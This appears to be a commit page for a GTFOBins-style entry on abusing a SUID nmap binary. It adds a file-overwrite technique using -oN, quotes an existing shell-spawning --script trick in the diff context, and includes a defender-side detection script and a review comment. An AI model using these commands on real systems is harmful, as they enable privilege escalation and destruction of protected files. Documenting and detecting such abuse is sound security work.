Adding another usage of Nmap's SUID

I came across this method on Stack Overflow while trying to execute commands using a SUID nmap binary; `--script` failed me, but this works. It could be enough to demonstrate the effect of using SUID on Nmap.

I've yet to come up with a way to over-write the contents of the system file with what we want; with this we can only over-write files with nmap output.

```bash
# Create a root-owned file that a normal user could not modify
sudo touch /etc/filecantbetouched
# Point nmap's normal output (-oN) at that file; a SUID nmap writes it as root
nmap 127.0.0.1 -oN=/etc/filecantbetouched
# The file now holds the nmap scan report
cat /etc/filecantbetouched
```
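The commit shows a SUID nmap writing its report into a protected file. As an added defender-side check (not part of this commit, GTFOBins or the nmap project), the script below flags an nmap binary carrying the setuid bit and hunts for files whose first line is the Nmap output header that `-oN`/`-oG` leaves behind; the sample file it scans is constructed inline.

```sh
#!/bin/sh
# Added defender-side checks, not part of the GTFOBins commit or of nmap:
#  (1) is_setuid / nmap_is_setuid: does an nmap binary carry the setuid bit?
#  (2) find_nmap_output_files: which files under a directory start with the
#      "# Nmap ... scan initiated ... as: ..." header that -oN/-oG writes,
#      i.e. the residue of the file-write primitive shown in the commit.

# Return 0 when $1's first line looks like Nmap normal/grepable output.
looks_like_nmap_output() {
  head -n 1 -- "$1" 2>/dev/null | grep -q '^# Nmap .* scan initiated .* as: '
}

# Print every regular file under $1 whose first line is an Nmap header.
# Exit status: 0 if at least one such file was found, 1 otherwise.
find_nmap_output_files() {
  find "$1" -type f 2>/dev/null | while IFS= read -r f; do
    looks_like_nmap_output "$f" && printf '%s\n' "$f"
  done | grep .
}

# Return 0 when $1 has the setuid bit set (POSIX test -u checks the mode bit).
is_setuid() {
  [ -u "$1" ]
}

# Return 0 when the nmap found on PATH is setuid, 1 if it is absent or not.
nmap_is_setuid() {
  bin=$(command -v nmap 2>/dev/null) && is_setuid "$bin"
}

# Demo on a constructed sample directory; no real system file is touched.
demo_dir=$(mktemp -d)
printf '# Nmap 7.80 scan initiated Mon Jan  4 12:16:29 2021 as: nmap -oN=/etc/filecantbetouched 127.0.0.1\nNmap scan report for localhost (127.0.0.1)\n' \
  > "$demo_dir/filecantbetouched"          # constructed: what -oN leaves behind
printf 'root:x:0:0:root:/root:/bin/sh\n' > "$demo_dir/passwd"   # constructed: benign
find_nmap_output_files "$demo_dir"         # prints only .../filecantbetouched
nmap_is_setuid && echo "WARNING: nmap on PATH is setuid" || echo "nmap on PATH is not setuid (or absent)"
rm -rf "$demo_dir"
```

Run it over `/etc` or another directory that should never contain scan reports; a hit is a strong indicator that an output-file option was pointed at a system file.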
Author: Syed Umar Arfeen, 2021-01-04 12:16:29 +05:00 (committed by GitHub)
Parent: 1c07880178
Commit: edc8a2d03d
Signature: no known key found for this signature in database (GPG Key ID: 4AEE18F83AFDEB23)

@ -108,4 +108,9 @@ functions:
TF=$(mktemp) TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF echo 'os.execute("/bin/sh")' > $TF
./nmap --script=$TF ./nmap --script=$TF
- description: This will over-write files with nmap output, use with caution.
code: |
sudo touch /etc/filecantbetouched
nmap 127.0.0.1 -oN=/etc/filecantbetouched
cat /etc/filecantbetouched
--- ---
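Review bot: the `sudo touch /etc/filecantbetouched` line in the new `code:` block requires root, so the entry does not show what an unprivileged user gains from a SUID nmap; drop that setup line and the trailing `cat`, and keep only the `nmap 127.0.0.1 -oN=...` invocation, using the file's existing placeholder style (`LFILE=file_to_write`) rather than a hard-coded `/etc/filecantbetouched`. The `description:` should also say precisely what happens instead of "use with caution": nmap replaces the target file's content with its normal-output report (nmap only appends when `--append-output` is given), so pointing `-oN` at a system file destroys that file, and the resulting file starts with a `# Nmap ... scan initiated ... as:` header that defenders can search for.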